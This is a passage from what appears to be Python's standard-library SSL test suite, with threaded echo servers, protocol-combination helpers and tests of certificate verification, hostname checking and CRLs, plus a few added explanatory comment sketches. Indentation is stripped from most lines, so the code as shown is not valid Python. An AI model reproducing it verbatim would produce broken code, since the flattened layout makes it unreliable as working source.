self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
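# --- Illustrative sketch, not part of the original test suite ----------------
# test_non_blocking_connect_ex, test_non_blocking_handshake and ssl_io_loop
# above all repeat the same non-blocking idiom: attempt the SSL operation and,
# on SSLWantReadError / SSLWantWriteError, wait for the underlying socket to
# become readable / writable before retrying.  A generic version of that idiom
# could be written as follows (the 5 second select timeout is an arbitrary
# choice; on timeout the loop simply retries):
def _retry_ssl_op(sock, op, *args, timeout=5.0):
    while True:
        try:
            return op(*args)
        except ssl.SSLWantReadError:
            select.select([sock], [], [], timeout)
        except ssl.SSLWantWriteError:
            select.select([], [sock], [], timeout)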
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ConnectionResetError:
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
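# --- Illustrative sketch, not part of the original test suite ----------------
# ThreadedEchoServer is used as a context manager throughout the tests below:
# entering it starts the listener thread and blocks until it is ready, leaving
# it stops and joins the thread.  A typical round trip, assuming
# testing_context() from earlier in this file, looks roughly like:
#
#   client_ctx, server_ctx, hostname = testing_context()
#   with ThreadedEchoServer(context=server_ctx, chatty=False) as server:
#       with client_ctx.wrap_socket(socket.socket(),
#                                   server_hostname=hostname) as s:
#           s.connect((HOST, server.port))
#           s.sendall(b"FOO\n")
#           # the connection handler echoes data back lower-cased
#           assert s.recv(1024) == b"foo\n"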
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
    class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
    def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
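# --- Illustrative sketch, not part of the original test suite ----------------
# server_params_test() is the work-horse used by ThreadedTests below: callers
# supply a client and a server context, one echo round trip is performed, and
# the returned stats dictionary describes the negotiated connection.  A minimal
# invocation, again assuming testing_context(), might look like:
#
#   client_ctx, server_ctx, hostname = testing_context()
#   stats = server_params_test(client_ctx, server_ctx,
#                              chatty=False, sni_name=hostname)
#   assert stats['version'] in ('TLSv1.2', 'TLSv1.3')
#   assert stats['peercert']            # the server presented a certificate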
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
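# --- Illustrative sketch, not part of the original test suite ----------------
# The three shapes of *expect_success* documented in the docstring above look
# like this in use (these mirror calls made in the protocol tests further down):
#
#   try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)         # must connect
#   try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)  # must fail
#   try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')    # must negotiate TLSv1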
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError while the handshake isn't
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
        # TLS 1.3 has a different handshake, so cap the client at TLS 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
            # TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
